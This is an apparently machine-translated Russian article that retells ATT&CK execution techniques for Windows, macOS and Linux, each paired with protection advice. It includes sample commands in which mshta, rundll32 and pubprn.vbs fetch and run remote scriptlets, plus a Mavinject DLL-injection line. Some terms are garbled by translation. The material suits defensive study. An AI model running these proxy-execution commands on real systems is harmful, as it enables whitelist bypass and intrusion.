Автор не несет ответственности за возможные последствия использования представленной в статье информации, а также приносит извинения за возможные неточности в некоторых формулировках и терминах.
Публикуемая информация представляет собой вольный пересказ содержания.
AppleScript
Система: macOS Права: Пользователь Описание: Язык AppleScript имеет возможность работать с Apple Events — сообщениями, которыми обмениваются приложения в рамках межпроцессного взаимодействия (IPC).С помощью Apple Event вы можете взаимодействовать практически с любым приложением, открытым локально или удаленно, запуская такие события, как открытие окон и нажатия клавиш.
Скрипты запускаются командой: Осаскрипт -е .
Злоумышленники могут использовать AppleScript для скрытного открытия SSH-соединений с удаленными хостами, открывая пользователям поддельные диалоговые окна.
AppleScript также можно использовать в более распространенных типах атак, таких как организация Reverse Shell. Рекомендации по защите: Обязательная проверка запускаемых скриптов AppleScript на подпись доверенного разработчика.
КМСТП (Обход AppLocker — CMSTP)
Система: Окна Права: Пользователь Описание: Установщик профиля диспетчера подключений Microsoft (cmstp.exe) — это встроенная в Windows утилита установки профиля диспетчера подключений.Cmstp.exe может принимать в качестве параметра INF-файл, поэтому злоумышленник может подготовить специальный вредоносный INF для загрузки и выполнения DLL или скриптлетов (*.
sct) с удаленных серверов, минуя AppLocker и другие блокировки, поскольку cmstp.exe подписан с помощью цифровой сертификат Microsoft. Рекомендации по защите: Блокировка запуска потенциально опасных приложений.
Мониторинг запуска C:\Windows\System32\cmstp.exe .
Интерфейс командной строки
Система: Виндовс, Линукс, МакОС Права: Пользователь, Администратор, Система Описание: С интерфейсом командной строки можно взаимодействовать локально или удаленно через программное обеспечение удаленного доступа, Reverse Shell и т. д. Команды выполняются с текущим уровнем разрешений процесса CLI, если только команда не включает вызов процесса, который меняет разрешения на запуск команды ( например, запланированное задание).Рекомендации по защите: Проведите аудит и/или заблокируйте командную строку с помощью таких инструментов, как AppLocker или политики ограничения программного обеспечения.
Элементы панели управления Windows
Система: Окна Права: Пользователь, Администратор, Система Описание: Эта тактика предполагает, что злоумышленники используют элементы панели управления Windows для выполнения произвольных команд в качестве полезной нагрузки (например, вируса).Ривер ).
Вредоносные объекты могут быть замаскированы под стандартные элементы управления и доставлены в систему с помощью фишинговых вложений.
Утилиты для просмотра и настройки параметров Windows представляют собой зарегистрированные exe-файлы и CPL-файлы элементов Панели управления Windows. Файлы CPL на самом деле представляют собой переименованные библиотеки DLL, которые можно запускать следующими способами:
прямо из командной строки: контроль.exe ; используя функции API из Shell32.dll: rundll32.exe оболочки32.dll,Control_RunDLL ; дважды щелкните файл cpl. Зарегистрированные CPL, хранящиеся в System32, автоматически отображаются в панели управления Windows и имеют уникальный идентификатор, хранящийся в реестре: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace Информация о других CPL, такая как отображаемое имя и путь к файлу CPL, хранится в подразделах.
"Каплс" И «Расширенные свойства» раздел: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Панель управления Некоторые CPL, запускаемые через командную оболочку, зарегистрированы в: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Папка Controls\ {имя} \shellex\PropertySheetHandlers Рекомендации по защите: Ограничить запуск и хранение файлов элементов Панели управления только в защищенных папках (например, C:\Windows\System32 ), включите контроль учетных записей пользователей (UAC) и AppLocker, чтобы предотвратить несанкционированные изменения в системе.
Конечно, используйте антивирусное программное обеспечение.
Протокол динамического обмена данными (DDE) Выполнение кода без макросов в MSWord
Система: Окна Права: Пользователь Описание: DDE — это протокол для связи между приложениями, которые совместно используют данные и общую память для обмена сообщениями.Например, документ Word может содержать таблицу, которая автоматически обновляется из документа Excel. Методика предполагает эксплуатацию уязвимости в приложениях MS Office, связанной с использованием протокола DDE в MS Office. Злоумышленники могут встраивать в документы MS Office объекты, содержащие команды, которые будут выполняться при открытии документа.
Например, документ Word может содержать объект Field, значение которого определяет команду {DDEAUTO } , который будет выполнен при открытии документа.
Несмотря на потерю актуальности, DDE можно включить, в том числе в Windows 10 и MS Office 2016, с помощью ключа: РазрешитьDDE (DWORD) = 2 в ключе реестра: HKEY_CURRENT_USER\Software\Microsoft\Office\ \Word\Безопасность .
Рекомендации по защите: Следовать Рекомендации Майкрософт и установите соответствующий Обновление MS Office .
В Windows 10 вы также можете включить опцию Сокращение поверхности атаки (ASR) для защиты от атак DDE и создания дочерних процессов приложениями MS Office.
Выполнение через API
Система: Окна Права: Пользователь, Администратор, Система Описание: Злоумышленники могут использовать API для выполнения двоичных файлов.Функции API, такие как CreateProcess, позволяют программам и сценариям запускать процессы, указывая необходимые пути и аргументы.
Функции API, которые можно использовать для выполнения двоичных файлов:
СоздатьПроцессА(), СоздатьПроцессW(); СоздатьПроцессКакПользовательА(), СоздатьПроцессКакПользовательW(); СоздатьПроцессВнутреннийА(), СоздатьПроцессВнутреннийW(); CreateProcessWithLogonW(), CreateProcessWithTokenW(); ЗагрузитьБиблиотекуА(), ЗагрузитьБиблиотекуW(); ЗагрузитьБиблиотекуExA(), ЗагрузитьБиблиотекуExW(); ЗагрузитьМодуль(); ЗагрузитьУпакованнуюБиблиотеку(); WinExec(); ShellExecuteA(), ShellExecuteW(); ShellExecuteExA(), ShellExecuteExW().Рекомендации по защите: Вызовы функций API — обычное явление, и их трудно отличить от вредоносной активности.
Вектор защиты должен быть направлен на предотвращение запуска инструментов злоумышленника в начале цепочки атаки, выявление вредоносного поведения и блокировку потенциально опасного программного обеспечения.
Выполнение через загрузку модуля
Система: Окна Права: Пользователь Описание: Выполнение кода можно организовать с помощью загрузчика модулей Windows — NTDLL.dll, который может загружать библиотеку DLL по произвольному локальному или сетевому пути.NTDLL.dll является частью Windows API и может вызывать такие функции, как СоздатьПроцесс() И ЗагрузитьБиблиотеку() .
Рекомендации по защите: Вызовы функций API — это стандартная функциональность ОС, которую сложно отличить от вредоносной активности.
Вектор защиты должен быть направлен на предотвращение запуска инструментов злоумышленника в начале цепочки атаки.
имеет смысл рассмотреть возможность ограничения загрузки DLL каталогами %Системрут% И %Программные файлы% .
Эксплуатация для выполнения клиента
Система: Виндовс, Линукс, МакОС Права: Пользователь Описание: Этот метод предполагает удаленное выполнение кода с использованием эксплойтов в пользовательском программном обеспечении.Наличие уязвимостей в программном обеспечении часто связано с нарушением разработчиками программного обеспечения требований безопасного программирования, что в конечном итоге приводит к возможности вызвать неожиданное поведение программного обеспечения.
Давайте рассмотрим некоторые типы эксплойтов:
ЭБраузерные эксплойты.Веб-браузеры являются мишенью для вредоносных загрузчиков и фишинговых ссылок.
Атакованная система может быть скомпрометирована через обычный браузер после того, как пользователь выполнит определенные действия, например, перейдет по ссылке, указанной в фишинговом письме.
Ээксплойты офисных приложений.
Вредоносные файлы отправляются в виде вложений или ссылок для скачивания.
Чтобы воспользоваться уязвимостью, пользователь должен открыть документ или файл для запуска эксплойта.
Ээксплойты сторонних приложений.
Распространенные приложения, такие как Adobe Reader и Flash, часто используемые в корпоративных средах, становятся целями злоумышленников.
В зависимости от программного обеспечения и характера уязвимости эксплуатация уязвимостей происходит в браузере или при открытии пользователем файла, например, Flash-объекты могут доставляться в документах MS Office. Рекомендации по защите: Своевременная установка обновлений используемых приложений.
Использование всех возможных средств изоляции потенциально уязвимых приложений — песочниц, инструментов микросегментации и виртуализации, например, Песочница для Windows и Apparmor, Docker для Linux. Также рекомендуется использовать системы защиты от эксплойтов, например, Exploit Guard в Защитнике Windows (WDEG) для Windows 10 или
Расширенный набор инструментов для смягчения последствий (EMET) для более ранних версий Windows.Графический интерфейс пользователя
Система: Виндовс, Линукс, МакОС Права: Пользователь, администратор, система.Описание: Запуск исполняемого файла или сценария происходит при взаимодействии с файлом через графический интерфейс пользователя (GUI) в интерактивном или удаленном сеансе, например RDP. Рекомендации по защите: Защитите учетные данные, которые могут быть использованы для удаленного входа в систему.
Определите ненужные системные утилиты и стороннее программное обеспечение, которые можно использовать для входа в интерактивный удаленный режим.
УстановитьUtil
Система: Окна Права: Пользователь Описание: InstallUtil — это утилита командной строки Windows, которая может устанавливать и удалять приложения, соответствующие спецификациям .NET Framework. Installutil автоматически устанавливается вместе с VisualStudio. Файл InstallUtil.exe подписан сертификатом Microsoft и хранится в: C:\Windows\Microsoft.NET\Framework\v[версия]\InstallUtil.exe Злоумышленники могут использовать функцию InstallUtil для выполнения прокси-кода и обхода белых списков приложений.
Рекомендации по защите: Возможно, ваша система не использует InstallUtil, поэтому рассмотрите возможность блокировки запуска InstallUtil.exe.
Драйверы LSASS
Система: Окна Права: Администратор, система Описание: Локальный орган безопасности (LSA) — это подсистема Windows, обеспечивающая аутентификацию пользователей.LSA включает в себя несколько динамически связанных библиотек DLL, которые запускаются в процессе LSASS.exe. Злоумышленники могут атаковать LSASS.exe, заменив или добавив мошеннические драйверы LSA, а затем выполнив произвольный код. Технология реализована во вредоносных программах Pasam и Wingbird, которые «подсаживают» модифицированные библиотеки DLL, используемые при загрузке LSASS. В этом случае вредоносный код выполняется до того, как произойдет сбой мошеннической DLL и впоследствии произойдет сбой службы LSASS. Рекомендации по защите: В Windows 8.1 и Windows Server 2012 R2 включите защиту LSA, задав ключ реестра: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL по смыслу двойное слово: 00000001 Эта защита гарантирует, что загруженные плагины и драйверы LSA будут иметь цифровую подпись Microsoft. В Windows 10 и Server 2016 включите Credential Guard в Защитнике Windows для запуска lsass.exe в изолированной виртуальной среде.
Включите режим безопасного поиска DLL, чтобы снизить риск загрузки вредоносных библиотек в lsass.exe: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode .
Launchctl
Система: macOS Права: Пользователь, администратор Описание: Launchctl — утилита для управления сервисом Launchd. С помощью Launchctl вы можете управлять системными и пользовательскими сервисами (LaunchDeamons и LaunchAgents), а также выполнять команды и программы.Launchctl поддерживает подкоманды командной строки, интерактивные или перенаправленные со стандартного ввода: launchctl submit -l [имя метки] — /Путь/к/вещи/к/выполнению ''arg" ''arg" ''arg" .
Запуская и перезапуская службы и демоны, злоумышленники могут выполнить код и даже обойти белый список, если launchctl является разрешенным процессом, но для загрузки, выгрузки и перезагрузки служб и демонов могут потребоваться повышенные привилегии.
Рекомендации по защите: Ограничьте права пользователей на создание агентов запуска и запуск Deamons с помощью групповой политики.
Использование приложения Тук-тук Вы можете найти программы, которые используют launchctl для управления агентами запуска и демонами запуска.
Выполнение с использованием локального планирования заданий
Система: Линукс, МакОС Права: Пользователь, администратор, root Описание: Злоумышленники могут создавать в атакованных системах задачи для запуска неавторизованных программ при загрузке системы или по расписанию.Системы Linux и Apple поддерживают несколько методов планирования запуска периодических фоновых задач: cron, at, launchd. В отличие от планировщика задач Windows, планирование задач в системах Linux невозможно выполнять удаленно, за исключением использования удаленных сеансов, таких как SSH. Рекомендации по защите: Ограничение прав пользователей на создание запланированных задач, блокировка системных утилит и другого программного обеспечения, которое можно использовать для планирования задач.
Мшта
Система: Окна Права: Пользователь Описание: Mshta.exe (находится в C:\Windows\System32\ ) — это утилита, выполняющая приложения Microsoft HTML (*.HTA).
Приложения HTA работают с использованием тех же технологий, что и Internet Explorer, но вне браузера.
Поскольку Mshta обрабатывает файлы в обход настроек безопасности браузера, злоумышленники могут использовать mshta.exe для прокси-исполнения вредоносных файлов HTA, Javascript или VBScript. Вредоносный файл можно запустить через встроенный скрипт: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.
]sct"")"))) или напрямую по URL: мшта http[:]//webserver/payload[.
]hta Рекомендации по защите: Функциональность mshta.exe связана со старыми версиями IE, жизненный цикл которых достиг конца.
Заблокируйте Mshta.exe, если вы не используете его функционал.
PowerShell
Система: Окна Права: Пользователь, администратор Описание: PowerShell (PS) — это мощный интерактивный интерфейс командной строки и среда сценариев, входящая в состав Windows. Злоумышленники могут использовать PS для сбора информации и выполнения кода.Например, командлет Start-Process может запустить исполняемый файл, командлет Invoke-Command выполнит команду локально или на удаленном компьютере.
PS также можно использовать для загрузки и запуска исполняемых файлов из Интернета, не сохраняя их на жесткий диск.
Удаленные подключения с использованием PS требуют прав администратора.
Существует ряд инструментов для атаки PS:
Рекомендации по защите: PS можно удалить из системы, если он больше не нужен.Если требуется PS, его запуск следует ограничить администраторами и запускать только подписанные сценарии.
Отключите службу WinRM, чтобы предотвратить удаленное выполнение сценариев PS. Следует отметить, что существуют методы обхода политик выполнения PS-скриптов .
Regsvcs/Регазм
Система: Окна Права: Пользователь, администратор Описание: Regsvcs и Regasm — это служебные программы Windows, используемые для регистрации в системе сборки .NET Component Object Model (COM).
Оба файла имеют цифровую подпись Microsoft. Злоумышленники могут использовать Regsvcs и Regasm для прокси-выполнения кода, указав в качестве атрибута код, который должен быть запущен перед регистрацией или отменой регистрации: [ComRegisterFunction] или [ComUnregisterFunction].
Код с такими атрибутами можно запустить, даже если процесс запущен с недостаточными привилегиями или даже аварийно завершает работу при запуске.
Рекомендации по защите: Заблокируйте Regsvcs.exe и Regasm.exe, если они не используются в вашей системе или сети.
Регсвр32 (Скублиду)
Система: Окна Права: Пользователь, администратор Описание: Regsvr32.exe — это консольная утилита для регистрации и отмены регистрации элементов управления OLE, таких как ActiveX и библиотеки DLL, в реестре.Regsvr32.exe имеет цифровую подпись Microsoft и может использоваться для выполнения прокси-кода.
Например, с помощью Regsvr32 вы можете загрузить XML-файл, содержащий фрагменты Java-кода (скриптлеты), которые будут выполняться в обход белого списка.
Рекомендации по защите: Сокращение поверхности атаки (ASR) в EMET и Advanced Theart Protection в Защитнике Windows могут помочь заблокировать использование Regsvr32.exe для обхода белых списков.
Рундлл32 (Повеликс)
Система: Окна Права: Пользователь Описание: Rundll32.exe — это системная утилита для запуска программ, найденных в динамически подключаемых библиотеках, которую можно вызвать для прокси-двоичного выполнения, запуская управляющие файлы Windows (.cpl) с помощью недокументированных функций shel32.dll — Control_RunDLL И Control_RunDLLAsUser .
Двойной щелчок по файлу .
cpl также приводит к запуску Rundll32.exe. Rundll32 также можно использовать для запуска таких сценариев, как JavaScript: rundll32.exe javascript:"\.
\mshtml,RunHTMLApplication";document.write();GetObject("scrippt:https[:]//www[.
]example[.
]com/malicious.sct)" Описанный выше способ использования rundll32.exe детектируется антивирусным ПО как вирус типа Poweliks. Рекомендации по защите: уменьшение поверхности атаки (ASR) в EMET и расширенная защита Theart в Защитнике Windows могут помочь заблокировать использование Rundll32.exe для обхода белых списков.
Выполнение с использованием запланированного задания Windows
Система: Окна Права: Пользователь, Администратор, Система Описание: Такие утилиты, как at, schtasks и планировщик задач Windows, можно использовать для планирования запуска программ и сценариев в определенную дату и время.Задачу можно запланировать на удаленной системе, если для аутентификации используется RPC, а также включен общий доступ к принтеру и файлам.
Кроме того, для планирования задач в удаленной системе необходимы права администратора.
Злоумышленники могут использовать удаленное планирование задач для запуска программ при запуске системы или в контексте определенной учетной записи.
Рекомендации по защите: Включите ограничение прав на создание заданий пользователями от имени Системы в реестре: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl = 0 Примечание: SubmitControl = 1 позволит членам группы «Операторы сервера» создавать задания.
Также выполните соответствующую настройку объекта групповой политики: Конфигурация компьютера > [Политики] > Настройки Windows > Параметры безопасности > Локальные политики > Параметры безопасности: Контроллер домена: Разрешить операторам сервера планировать задачи: отключено Конфигурация компьютера > [Политики] > Настройки Windows > Параметры безопасности > Локальные политики > Назначение прав пользователя: повысить приоритет планирования Рассмотрите возможность использования в своем бизнесе PowerSploit Framework, который включает модуль PowerUP для поиска уязвимостей в разрешениях запланированных задач.
Сценарии
Система: Виндовс, Линукс, МакОС Права: Пользователь Описание: Злоумышленники могут использовать скрипты для автоматизации своих действий, ускорения оперативных задач и, как следствие, сокращения времени получения доступа.Некоторые скриптовые языки можно использовать для обхода механизмов мониторинга процессов за счет прямого взаимодействия с ОС на уровне API вместо вызова других программ.
Сценарии можно встраивать в документы Office в виде макросов, а затем использовать в фишинговой атаке.
В этом случае злоумышленники рассчитывают на то, что пользователь запустит файл с макросом или на то, что пользователь согласится активировать макрос.
Существует несколько популярных фреймворков для реализации скриптов — Metasploit, Veil, PowerSploit. Рекомендации по защите: Ограничьте доступ к таким сценариям, как VBScript или PowerShell. В Windows настройте параметры безопасности MS Office, включив защищенный просмотр и заблокировав макросы через объект групповой политики.
Если макросы необходимы, разрешите запуск только макросов, подписанных доверенной цифровой подписью.
Используйте микросегментацию и виртуализацию приложений, например Sandboxie для Windows и Apparmor, Docker для Linux.
Выполнение услуги
Система: Окна Права: Администратор, Система Описание: Злоумышленники могут выполнить двоичный код, команду или сценарий, используя специальные методы взаимодействия со службами Windows, такие как Менеджер по контролю обслуживания (SCM) вы можете создавать новые службы и изменять уже работающие.Рекомендации по защите: Убедитесь, что текущие настройки системных разрешений не позволяют пользователям с низкими привилегиями запускать службы с высокими привилегиями.
Убедитесь, что исполняемые файлы с высокими разрешениями в системе не могут быть заменены или изменены пользователями с более низкими разрешениями.
Рассмотрите возможность использования AppLocker для ограничения запуска потенциально опасных программ и настройки политик ограничения использования программ ( Политики ограничения программного обеспечения ).
Выполнение через подписанные двоичные файлы (Выполнение подписанного двоичного прокси)
Система: Окна Права: Пользователь Описание: Двоичные файлы, подписанные доверенными цифровыми сертификатами, могут выполняться в системах Windows, защищенных проверкой цифровой подписи.Несколько файлов Microsoft, подписанных по умолчанию при установке Windows, можно использовать для проксирования запуска других файлов: Мавинжект.exe — это утилита Windows, позволяющая выполнять код. Mavinject можно использовать для внедрения DLL в работающий процесс: «C:\Program Files\Common Files\microsoftshared\ClickToRun\MavInject32.exe» [PID] /INJECTRUNNING [PATH DLL] C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL] SyncAppvPublishingServer.exe - можно использовать для запуска сценариев PowerShell без запуска powershell.exe. А также есть несколько подобных двоичных файлов .
Рекомендации по защите: Многие подписанные файлы могут не использоваться в вашей системе, поэтому рассмотрите возможность блокировки их запуска.
Выполнение через подписанные сценарии (Signed Script Proxy Execution)
Система: Окна Права: Пользователи Описание: Скрипты, подписанные доверенными сертификатами, могут использоваться для проксирования вредоносных файлов, например PubPrn.vbs подписан сертификатом Microsoft и может использоваться для запуска файла с удаленного сервера: cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs 127.0.0.1 скрипт:http[:]//192.168.1.100/hi.png Рекомендации по защите: Такие подписанные сценарии могут не потребоваться в вашей системе, поэтому рассмотрите возможность блокировки их запуска.
Исходная команда
Система: Линукс и МакОС Права: Пользователь Описание: Source — это команда, которая позволяет вам читать и выполнять все команды из указанного файла в текущей командной оболочке, это означает, что все указанные переменные среды будут видны во всех скриптах и командах, которые будут запускаться.Source можно запустить двумя способами: источник /путь/к/имя_файла [аргументы] или .
/путь/к/имя_файла [аргументы] Обратите внимание на пробел после точки.
Без пробела программа будет запущена в новой командной оболочке.
Злоумышленники могут использовать Source для выполнения файлов, которые не помечены как исполняемые флагом «x».
Рекомендации по защите: Предотвратить использование встроенных команд в системе достаточно сложно ввиду их легальности, поэтому вектор защиты должен быть направлен на предотвращение вредоносных действий на более ранних этапах атаки, например, на этапе доставки или создания вредоносного файла.
файл в системе.
Пробел после имени файла
Система: Линукс, МакОС Права: Пользователь Описание: Злоумышленники могут скрыть истинный тип файла, изменив его расширение.Для определенных типов файлов (не работает с файлами .
app) добавление символа пробела в конец имени файла изменит способ обработки файла операционной системой.
Например, если существует исполняемый файл Mach-O с именем evil.bin, то когда пользователь дважды щелкнет по нему, ОС запустит Terminal.app и выполнит его.
Если вы переименуете тот же файл в evil.txt, то двойной щелчок по нему запустит его в текстовом редакторе.
Однако если файл переименован в «evil.txt» (пробел в конце), то при двойном щелчке по истинному типу файла ОС определит тип и запустится двоичный файл.
Злоумышленники могут использовать эту технику, чтобы обманом заставить пользователя запустить вредоносный исполняемый файл.
Рекомендации по защите: Использование данной методики сложно предотвратить, поскольку.
злоумышленник использует стандартные механизмы работы ОС, поэтому вектор защиты должен быть направлен на предотвращение вредоносных действий на более ранних стадиях атаки, например, на этапе доставки или создание вредоносного файла в системе.
Выполнение с использованием стороннего программного обеспечения для администрирования сети (Стороннее программное обеспечение)
Теги: #att&ck #уязвимость #методы атаки #хакерские атаки #выполнение #killchain #applescript #CMSTP #Интерфейс командной строки #Элементы панели управления Windows #Динамический обмен данными #dde #Выполнение через API #Выполнение через загрузку модуля #Эксплуатация для выполнения клиента #Графический интерфейс пользователя #InstallUtil #lsass #Launchctl #Планирование локальных заданий #Mshta #PowerShell #Regsvcs #Regasm #Regsvr32 #Rundll32 #запланированная задача #сценарий #Выполнение подписанного двоичного прокси #Выполнение подписанного скрипта #source #Пробел после имени файла #Third- party Software #Trap #Trusted Developer Utilities #User Execution #wmi #WinRM #Удаленное управление Windows #информационная безопасность-
Экспорт Архива Gmail И Календаря Google
19 Oct, 24 -
Психология В Ит
19 Oct, 24 -
Глобальный Конкурс Aws Для Стартапов
19 Oct, 24 -
Удержание Пространства От Flurry
19 Oct, 24
